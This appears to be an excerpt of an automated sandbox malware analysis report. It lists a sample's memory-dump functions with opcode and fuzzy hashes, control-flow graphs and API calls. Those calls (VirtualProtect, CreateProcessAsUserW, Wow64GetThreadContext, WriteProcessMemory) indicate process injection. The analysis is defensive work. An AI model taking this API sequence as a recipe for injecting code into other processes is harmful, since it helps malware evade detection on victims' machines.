                Function 07680FDA Relevance: .3, Instructions: 286COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b7db86b210ce44472dbaa34de711ae37133dbdf489d3355cae4fd244c67f9bb2
                • Instruction ID: a98e6bf16cbb2b372e7a2773f20bc23700d1798036cdb7c5a5e9d2914b4777ee
                • Opcode Fuzzy Hash: b7db86b210ce44472dbaa34de711ae37133dbdf489d3355cae4fd244c67f9bb2
                • Instruction Fuzzy Hash: 4BD12A74D112698FCB68DF25C85479DBBF6BF89300F10CAEAD40AA7214DB749A868F40
                Function 0756B368 Relevance: .3, Instructions: 278COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 71e9647864539a91bd1f23cfd00ada6c127b351655ce56573e82974390e8d140
                • Instruction ID: c611496eb1010ba1a09dd229cd887a129bae68b05871e60f9397306e74b41a9f
                • Opcode Fuzzy Hash: 71e9647864539a91bd1f23cfd00ada6c127b351655ce56573e82974390e8d140
                • Instruction Fuzzy Hash: 14C1D6F0E1120ADFCB14DFA9C4858AEFBB2FF89301B209556D416AB354D734A982CF95
                Function 07684B59 Relevance: .2, Instructions: 189COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: babc990b0278a905977487d681c1a1ad97d92f96752e4d18f52ec1215361e73b
                • Instruction ID: adf00baa6f3b7eafd0ef5ea0be9880f2e766088352b2b796e3ad0923b037f639
                • Opcode Fuzzy Hash: babc990b0278a905977487d681c1a1ad97d92f96752e4d18f52ec1215361e73b
                • Instruction Fuzzy Hash: 4D9111B4E11259CFDB54DF69D858B9DBFB2BF89300F1081AAE40AAB351DB304A85CF10
                Function 07680220 Relevance: .2, Instructions: 150COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 48d02e202bdfb73d0362fe32c33f5b20a3725cc6173234cba5d9f4ea9f9cbbc9
                • Instruction ID: 557fe9c46fd405f68dbb907389b488d87d9d3a15aa6e7211bbd2e61d35e3534c
                • Opcode Fuzzy Hash: 48d02e202bdfb73d0362fe32c33f5b20a3725cc6173234cba5d9f4ea9f9cbbc9
                • Instruction Fuzzy Hash: 446168B0D14219DFCB44DFA9C5956AEBBB1FF89301F00892AE412A7350DBB49A4ACF50
                Function 07569A88 Relevance: .1, Instructions: 146COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fd087a3107658f9e0cf08ccae9cceb27c7a7750de6a48fd901171c24fd341663
                • Instruction ID: 1a595afb2c21f27e9715c7b28d20785d5c2d6715825fb344ee2b76c56e46d30a
                • Opcode Fuzzy Hash: fd087a3107658f9e0cf08ccae9cceb27c7a7750de6a48fd901171c24fd341663
                • Instruction Fuzzy Hash: A4512AB0E182098FDB08CFAAC4455EEFBF2BF89300F24D46AD415A7264D7349A41CF95
                Function 07680210 Relevance: .1, Instructions: 143COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c611967e03b4ed5776434d98a4078ba3d39262c8655bd7a8910bbf63d66a61fe
                • Instruction ID: 41b7e4fc7bddcee62a71dc46425165eec8d7d23cbe399ddf7b4e86b8b9bc0571
                • Opcode Fuzzy Hash: c611967e03b4ed5776434d98a4078ba3d39262c8655bd7a8910bbf63d66a61fe
                • Instruction Fuzzy Hash: 2F516CB0D14219DFDB44DFA8C5A96ADBBB1FF89301F00896AE413A7354DB745A4ACF10
                Function 07680006 Relevance: .1, Instructions: 136COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f3fb02995d074292d70ddb95fa3108939817cea4572347e6eab63180f00eb32c
                • Instruction ID: 7c813ce07b70511c856f5842de2f80b3bcd6cc47140fc94671c3b328c0c7a231
                • Opcode Fuzzy Hash: f3fb02995d074292d70ddb95fa3108939817cea4572347e6eab63180f00eb32c
                • Instruction Fuzzy Hash: 5A51C0B0D0934ADFDB45CFA5C8406AEBFB1FF8A310F14995AD462A7250D338460ACF91
                Function 07680040 Relevance: .1, Instructions: 118COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2d8f1a33684220d5680b9bb86beea8a702cd0d709b471a2d5b71f6f4fd87db81
                • Instruction ID: 732e316407e8728de58e66cdfdb83f6fca8f20055b037aeeadabbd077acd6870
                • Opcode Fuzzy Hash: 2d8f1a33684220d5680b9bb86beea8a702cd0d709b471a2d5b71f6f4fd87db81
                • Instruction Fuzzy Hash: 504147B0D1520ADBDB84DFE6D8415EEFBB5FF8A310F10992AD922B6210D73446468FA4
                Function 0756A459 Relevance: .1, Instructions: 75COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2bf5d1194f98625ba84ef3210efca9caba8f76361ebe69bbbd3a160f8ea329ed
                • Instruction ID: 85ddc082dbbec7a0c46e9e75272e9a85d7f67789ad071231174805147ee8b4a6
                • Opcode Fuzzy Hash: 2bf5d1194f98625ba84ef3210efca9caba8f76361ebe69bbbd3a160f8ea329ed
                • Instruction Fuzzy Hash: 5131E8B1E016588BEB18CFAAD8543DEBBF2AFC9310F14C16AD409AB254DB751A45CF50
                Function 00EAAB28 Relevance: 3.2, Strings: 2, Instructions: 697COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 5430 eaab28-eab016 5505 eab568-eab59d 5430->5505 5506 eab01c-eab02c 5430->5506 5510 eab5a9-eab5c7 5505->5510 5511 eab59f-eab5a4 5505->5511 5506->5505 5507 eab032-eab042 5506->5507 5507->5505 5509 eab048-eab058 5507->5509 5509->5505 5512 eab05e-eab06e 5509->5512 5523 eab5c9-eab5d3 5510->5523 5524 eab63e-eab64a 5510->5524 5513 eab68e-eab693 5511->5513 5512->5505 5514 eab074-eab084 5512->5514 5514->5505 5516 eab08a-eab09a 5514->5516 5516->5505 5517 eab0a0-eab0b0 5516->5517 5517->5505 5519 eab0b6-eab0c6 5517->5519 5519->5505 5520 eab0cc-eab0dc 5519->5520 5520->5505 5522 eab0e2-eab0f2 5520->5522 5522->5505 5525 eab0f8-eab567 5522->5525 5523->5524 5531 eab5d5-eab5e1 5523->5531 5529 eab64c-eab658 5524->5529 5530 eab661-eab66d 5524->5530 5529->5530 5539 eab65a-eab65f 5529->5539 5540 eab66f-eab67b 5530->5540 5541 eab684-eab686 5530->5541 5536 eab5e3-eab5ee 5531->5536 5537 eab606-eab609 5531->5537 5536->5537 5549 eab5f0-eab5fa 5536->5549 5542 eab60b-eab617 5537->5542 5543 eab620-eab62c 5537->5543 5539->5513 5540->5541 5551 eab67d-eab682 5540->5551 5541->5513 5542->5543 5555 eab619-eab61e 5542->5555 5547 eab62e-eab635 5543->5547 5548 eab694-eab6b8 5543->5548 5547->5548 5552 eab637-eab63c 5547->5552 5556 eab6bf-eab6c4 5548->5556 5557 eab6c6 5548->5557 5549->5537 5560 eab5fc-eab601 5549->5560 5551->5513 5552->5513 5555->5513 5559 eab6c8-eab6c9 5556->5559 5557->5559 5560->5513
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2494359920.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_ea0000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: $cq$$cq
                • API String ID: 0-2695052418
                • Opcode ID: 848db13104c3503da89831d9a5d77d2271eb4b736e28834e9408fd14ad7477e4
                • Instruction ID: d355d36f4da16a8bce6c6aeab119893579362d176166a23cac34394a24e2f312
                • Opcode Fuzzy Hash: 848db13104c3503da89831d9a5d77d2271eb4b736e28834e9408fd14ad7477e4
                • Instruction Fuzzy Hash: ED523F74A00218CFEF149BA4C864BAEBB77FF88300F1180A9D14A6B395DF359E959F51
                Function 00EA5EF8 Relevance: 2.9, Strings: 2, Instructions: 430COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 6230 ea5ef8-ea5f0f 6231 ea5f2b-ea5f39 6230->6231 6232 ea5f11-ea5f29 6230->6232 6235 ea5f40-ea5f45 6231->6235 6236 ea5f3b call ea5d48 6231->6236 6232->6235 6374 ea5f47 call ea5ee8 6235->6374 6375 ea5f47 call ea5ef8 6235->6375 6376 ea5f47 call ea61f0 6235->6376 6236->6235 6238 ea5f4d-ea5f53 6239 ea61d9-ea61fe 6238->6239 6240 ea5f59-ea5f67 6238->6240 6245 ea620d-ea621f 6239->6245 6246 ea6200-ea6206 6239->6246 6243 ea5f69-ea5f70 6240->6243 6244 ea5fbf-ea5fc8 6240->6244 6247 ea60c9-ea60f5 6243->6247 6248 ea5f76-ea5f7b 6243->6248 6249 ea5fce-ea5fd2 6244->6249 6250 ea60fc-ea6128 6244->6250 6260 ea62b3-ea62b5 6245->6260 6261 ea6225-ea6229 6245->6261 6246->6245 6247->6250 6251 ea5f7d-ea5f83 6248->6251 6252 ea5f93-ea5fa1 6248->6252 6254 ea5fe3-ea5ff8 6249->6254 6255 ea5fd4-ea5fdd 6249->6255 6302 ea612f-ea6199 6250->6302 6257 ea5f87-ea5f91 6251->6257 6258 ea5f85 6251->6258 6270 ea5faa-ea5fba 6252->6270 6271 ea5fa3-ea5fa5 6252->6271 6366 ea5ffb call ea65e8 6254->6366 6367 ea5ffb call ea65d8 6254->6367 6368 ea5ffb call ea6828 6254->6368 6369 ea5ffb call ea68c0 6254->6369 6255->6250 6255->6254 6257->6252 6258->6252 6379 ea62b7 call ea6440 6260->6379 6380 ea62b7 call ea6450 6260->6380 6264 ea622b-ea6237 6261->6264 6265 ea6239-ea6246 6261->6265 6262 ea6001-ea6008 6266 ea600a-ea6015 6262->6266 6267 ea6023-ea6027 6262->6267 6281 ea6248-ea6252 6264->6281 6265->6281 6377 ea6018 call ea8160 6266->6377 6378 ea6018 call ea8150 6266->6378 6276 ea602d-ea6031 6267->6276 6277 ea61a0-ea61d2 6267->6277 6278 ea60bf-ea60c6 6270->6278 6271->6278 6273 ea62bd-ea62c3 6279 ea62cf-ea62d6 6273->6279 6280 ea62c5-ea62cb 6273->6280 6276->6277 6284 ea6037-ea6042 6276->6284 6277->6239 6287 ea62cd 6280->6287 6288 ea6331-ea6390 6280->6288 6296 ea627f-ea6283 6281->6296 6297 ea6254-ea6263 6281->6297 6282 ea601e 6282->6278 6284->6277 6298 ea6048-ea6075 6284->6298 6287->6279 6310 ea6397-ea63bb 6288->6310 6299 ea628f-ea6293 6296->6299 6300 ea6285-ea628b 6296->6300 6312 ea6273-ea627d 6297->6312 6313 ea6265-ea626c 6297->6313 6298->6277 6315 ea607b-ea608a 6298->6315 6299->6279 6305 ea6295-ea6299 6299->6305 6303 ea62d9-ea632a 6300->6303 6304 ea628d 6300->6304 6302->6277 6303->6288 6304->6279 6309 ea629f-ea62b1 6305->6309 6305->6310 6309->6279 6325 ea63bd-ea63bf 6310->6325 6326 ea63c1-ea63c3 6310->6326 6312->6296 6313->6312 6370 ea608d call ea8160 6315->6370 6371 ea608d call ea8150 6315->6371 6317 ea6093-ea6097 6317->6302 6323 ea609d-ea60a9 6317->6323 6372 ea60ab call ead688 6323->6372 6373 ea60ab call ead678 6323->6373 6328 ea6439-ea643c 6325->6328 6329 ea63d4-ea63d6 6326->6329 6330 ea63c5-ea63c9 6326->6330 6337 ea63d8-ea63dc 6329->6337 6338 ea63e9-ea63ef 6329->6338 6335 ea63cb-ea63cd 6330->6335 6336 ea63cf-ea63d2 6330->6336 6333 ea60b1-ea60b7 6333->6277 6340 ea60bd 6333->6340 6335->6328 6336->6328 6341 ea63de-ea63e0 6337->6341 6342 ea63e2-ea63e7 6337->6342 6344 ea641a-ea641c 6338->6344 6345 ea63f1-ea6418 6338->6345 6340->6278 6341->6328 6342->6328 6349 ea6423-ea6425 6344->6349 6345->6349 6352 ea642b-ea642d 6349->6352 6353 ea6427-ea6429 6349->6353 6357 ea642f-ea6434 6352->6357 6358 ea6436 6352->6358 6353->6328 6357->6328 6358->6328 6366->6262 6367->6262 6368->6262 6369->6262 6370->6317 6371->6317 6372->6333 6373->6333 6374->6238 6375->6238 6376->6238 6377->6282 6378->6282 6379->6273 6380->6273
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2494359920.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_ea0000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: Hgq$Hgq
                • API String ID: 0-3391890871
                • Opcode ID: 960f31014448f4afa35917bc8b7ae1111e504ec38ff07a43a4fffa843e74372e
                • Instruction ID: cca7f8298bdcf4dff8ffde52f258fe389b3a42f4b1452f1ff84b69d8998febd2
                • Opcode Fuzzy Hash: 960f31014448f4afa35917bc8b7ae1111e504ec38ff07a43a4fffa843e74372e
                • Instruction Fuzzy Hash: 99E1D9307002159FDB15AF68D868B7E7BA6EB8E344F188428E516EB391DF34EC41DB91
                Function 07B7AF70 Relevance: 2.8, Strings: 2, Instructions: 297COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2509920477.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7b70000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: PHcq$PHcq
                • API String ID: 0-4229179212
                • Opcode ID: 3e79482b9e50d17a82ec350575b06cef7665bae9b8c1d2cd49270eb42c8aefbe
                • Instruction ID: 0be903ac282c964e276c5aa1fd6122dbe1cdb5494bbb86c76d70976068db3d57
                • Opcode Fuzzy Hash: 3e79482b9e50d17a82ec350575b06cef7665bae9b8c1d2cd49270eb42c8aefbe
                • Instruction Fuzzy Hash: 5FC1E4B4600215CFDB14DF68C994AAEBBF2FF88711B2545A8E416AB3A1DB31EC41CF50
                Function 00EA87D0 Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2494359920.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_ea0000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: 4'cq$Tecq
                • API String ID: 0-1269237527
                • Opcode ID: a1bbe4edd94e429a3da95d8240d6548f5f6d2bf759a31a9b19dbcfff7b3445b9
                • Instruction ID: 1fbd2fba8e74134720f071493de16e83bdbecc2ef42003f6a6438f8cd3f378a7
                • Opcode Fuzzy Hash: a1bbe4edd94e429a3da95d8240d6548f5f6d2bf759a31a9b19dbcfff7b3445b9
                • Instruction Fuzzy Hash: 57B18F71A00219CFCB14DF68D984AAEBBB1FF89304F159469E809BB3A1DB31ED45CB51
                Function 00EA47D8 Relevance: 2.7, Strings: 2, Instructions: 176COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2494359920.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_ea0000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: 8gq$8gq
                • API String ID: 0-2080003314
                • Opcode ID: 9389a1028e5f5a41c3ef28449ee8783d981d7696c363f8bb86a424bcc03fcf43
                • Instruction ID: 3e135aa116a8d14c72b544c269e9124abf8c6d9ea995a45eaf22820662a31f9c
                • Opcode Fuzzy Hash: 9389a1028e5f5a41c3ef28449ee8783d981d7696c363f8bb86a424bcc03fcf43
                • Instruction Fuzzy Hash: C471B4B4E01218DFDB14DFA9D994ADDBBB2BF89300F20816AE415AB3A4DB745941CF50
                Function 07B724F8 Relevance: 2.7, Strings: 2, Instructions: 161COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2509920477.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7b70000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: (gq$Hgq
                • API String ID: 0-3303014377
                • Opcode ID: af926182fe316cace60427f8dfb95febb26e340e0ba86dac3d6b2368e5da504b
                • Instruction ID: b9006b73efa9661c1824f84e38ebe6bef840e8ba06a5225cd96998063addeb57
                • Opcode Fuzzy Hash: af926182fe316cace60427f8dfb95febb26e340e0ba86dac3d6b2368e5da504b
                • Instruction Fuzzy Hash: AA5112F17041919FE718AF38C4946BD7BE6EF85300F1884BAE4599B791CB34AC42DB92
                Function 00EA9DA0 Relevance: 2.6, Strings: 2, Instructions: 150COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2494359920.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_ea0000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: Hgq$Hgq
                • API String ID: 0-3391890871
                • Opcode ID: 7a7a48c7f1531e75ed54a2c7a55d094cdfaa5b2a3c5ca7106b107629d787d1d7
                • Instruction ID: a2e427e8523bc0d388ded5326b11e47eb121cc86f1594888c8edb330b09d67d5
                • Opcode Fuzzy Hash: 7a7a48c7f1531e75ed54a2c7a55d094cdfaa5b2a3c5ca7106b107629d787d1d7
                • Instruction Fuzzy Hash: D351AB313042559FDB15DF28C850AAA7BE6FF8E308F058469E809AF392DB35EC41C791
                Function 072109FF Relevance: 2.6, Strings: 2, Instructions: 100COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2509104692.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7210000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: TJhq$Tecq
                • API String ID: 0-1580033827
                • Opcode ID: 9d3c94075bc42d4ad717779d322fbf49bdfeb28e3574d3030cac6ef3b3b771e0
                • Instruction ID: 6779a0fc3df46a87050e12a24fafac702a70c74adbd7158b84070f2f31dde1a4
                • Opcode Fuzzy Hash: 9d3c94075bc42d4ad717779d322fbf49bdfeb28e3574d3030cac6ef3b3b771e0
                • Instruction Fuzzy Hash: 0C31C4717141118FCB05BBBCE598A2E7BF6FF89610B5148A9E449DB3A6CF389C09C351
                Function 07210A18 Relevance: 2.6, Strings: 2, Instructions: 91COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2509104692.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7210000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: TJhq$Tecq
                • API String ID: 0-1580033827
                • Opcode ID: c9cba196ee832d7d607ba26220ded3ced486d9d52b1b7a842414db1fceb69be7
                • Instruction ID: e759a462420ec7a3aa8d5e30573d9e36a5572bcf3774074c0ef13d010b4994f4
                • Opcode Fuzzy Hash: c9cba196ee832d7d607ba26220ded3ced486d9d52b1b7a842414db1fceb69be7
                • Instruction Fuzzy Hash: F421E4317101158FCB04BBBDE59DA2E77FAFFC9610B404869E409D7399CE349C0583A1
                Function 07B70281 Relevance: 1.7, Strings: 1, Instructions: 456COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2509920477.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7b70000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: #l^
                • API String ID: 0-3339438350
                • Opcode ID: 2902dc5d3b0f12ed7e4376fd28fd42bc48918eaae53c1d4c4d2cda689c0984dd
                • Instruction ID: 8846286a8c1af9211411865966af407bec731c90e2048e751a4b69e5a722a73f
                • Opcode Fuzzy Hash: 2902dc5d3b0f12ed7e4376fd28fd42bc48918eaae53c1d4c4d2cda689c0984dd
                • Instruction Fuzzy Hash: 1E223CF0905F434EE7746F68C5C839EB6A0EB09364F20699FC4FA89265D735E086CB49
                Function 0721A6E8 Relevance: 1.7, Strings: 1, Instructions: 441COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2509104692.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7210000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: @
                • API String ID: 0-2766056989
                • Opcode ID: 27ed58e7e5a3c5bc91bf346acbe7e4896329b3af29454e02b4cdf6233bfa1582
                • Instruction ID: 9a5371b205e830f604b8808fb0cb039334501571b02348d15cc49d269e1dd234
                • Opcode Fuzzy Hash: 27ed58e7e5a3c5bc91bf346acbe7e4896329b3af29454e02b4cdf6233bfa1582
                • Instruction Fuzzy Hash: 91D1F070A15345CFCB05FBB8E59966D7BF2BF89200F8188A9E045E7365DE389809CB51
                Function 075685A8 Relevance: 1.7, APIs: 1, Instructions: 168memoryCOMMON
                Download Yara Rule
                APIs
                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 075686E3
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: 2c6cea1dfc5b0c915d25233480485e0a86873a0090bdeb9a776b38222e66834b
                • Instruction ID: 6a62230ce45c34d4f038e22292fa7f4ce2f6782c62d3c0f186013131f8492ff0
                • Opcode Fuzzy Hash: 2c6cea1dfc5b0c915d25233480485e0a86873a0090bdeb9a776b38222e66834b
                • Instruction Fuzzy Hash: AB5127B29007819ECB10CF59E84CADBBBF0FF65365F14882AD4A597511C334B4468BD5
                Function 07685C95 Relevance: 1.7, APIs: 1, Instructions: 167processCOMMON
                Download Yara Rule
                APIs
                • CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 07685E0B
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: CreateProcessUser
                • String ID:
                • API String ID: 2217836671-0
                • Opcode ID: d89ec6fb814206d1b68541752efba54d078dca2f0f6453c22f1e24bfc09ad5fc
                • Instruction ID: ee3248891cdebc38ae0096f6a05b1666d8e1a16dbfe5bc117271623100c08c11
                • Opcode Fuzzy Hash: d89ec6fb814206d1b68541752efba54d078dca2f0f6453c22f1e24bfc09ad5fc
                • Instruction Fuzzy Hash: 99510AB1D0025ADFCB21DF69C844BDDBBB1BF48310F04859AE919B7250DB719A89CF90
                Function 05C31480 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                Download Yara Rule
                APIs
                • CallWindowProcW.USER32(?,?,?,?,?), ref: 05C31541
                Memory Dump Source
                • Source File: 00000000.00000002.2507707388.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_5c30000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: CallProcWindow
                • String ID:
                • API String ID: 2714655100-0
                • Opcode ID: d4d9c4e3a9a410a966d6fb056847746a40115987cff9b0a8ac178a6a2d4fe37b
                • Instruction ID: 6abf9a697d88eb1b2694c566eaa110a458ececa7e8fd56a7dff85f4d7c5e944a
                • Opcode Fuzzy Hash: d4d9c4e3a9a410a966d6fb056847746a40115987cff9b0a8ac178a6a2d4fe37b
                • Instruction Fuzzy Hash: E241F7B59003498FDB14CF99C449AAABBF5FB88314F25C859D51AAB321D374A941CFA0
                Function 07687719 Relevance: 1.6, APIs: 1, Instructions: 88threadCOMMON
                Download Yara Rule
                APIs
                • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 076877EE
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: ContextThreadWow64
                • String ID:
                • API String ID: 983334009-0
                • Opcode ID: 2d9347f412255e14e210edaf0f8e98032c8819aef3cba4eb0fdfa84c57bc90a1
                • Instruction ID: 2e63b5c2d9b1ad8e3c4df58ac62cfd9e895aa3dcb314515120c6224f838e870e
                • Opcode Fuzzy Hash: 2d9347f412255e14e210edaf0f8e98032c8819aef3cba4eb0fdfa84c57bc90a1
                • Instruction Fuzzy Hash: 39319AB1D003498FCB10DFA9C8857EEBBF0EF48324F24856AD819A7341C7385A41DB91
                Function 0756E700 Relevance: 1.6, APIs: 1, Instructions: 77memoryCOMMON
                Download Yara Rule
                APIs
                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0756E77B
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: 120bd1a3659b151de40f6f3da53ebd6334514ef6c82eb68af8dd55f3391053da
                • Instruction ID: 6210b4666b3f0794a939ad541807058915a4f1c141022b3cbb6fc1505f8f1bec
                • Opcode Fuzzy Hash: 120bd1a3659b151de40f6f3da53ebd6334514ef6c82eb68af8dd55f3391053da
                • Instruction Fuzzy Hash: 67315AB5D01259CFCB10CF9AD4856DEBBF4FB48311F10846AE868A7350D7789541DF91
                Function 076881B0 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                Download Yara Rule
                APIs
                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07688248
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: MemoryProcessWrite
                • String ID:
                • API String ID: 3559483778-0
                • Opcode ID: 0b6b244be94697cb0813e646d6781bef18a8957eb8599c32499b8e1078534fdd
                • Instruction ID: f13ed026eb47ae4b9dfdaaa2ced70a2ca724b7fea3bc22914067dd8fee3fd023
                • Opcode Fuzzy Hash: 0b6b244be94697cb0813e646d6781bef18a8957eb8599c32499b8e1078534fdd
                • Instruction Fuzzy Hash: CE2146B6D0030A8FCB10DFA9C9857DEBBF1FF48310F10882AE919A7240C7789945DBA0
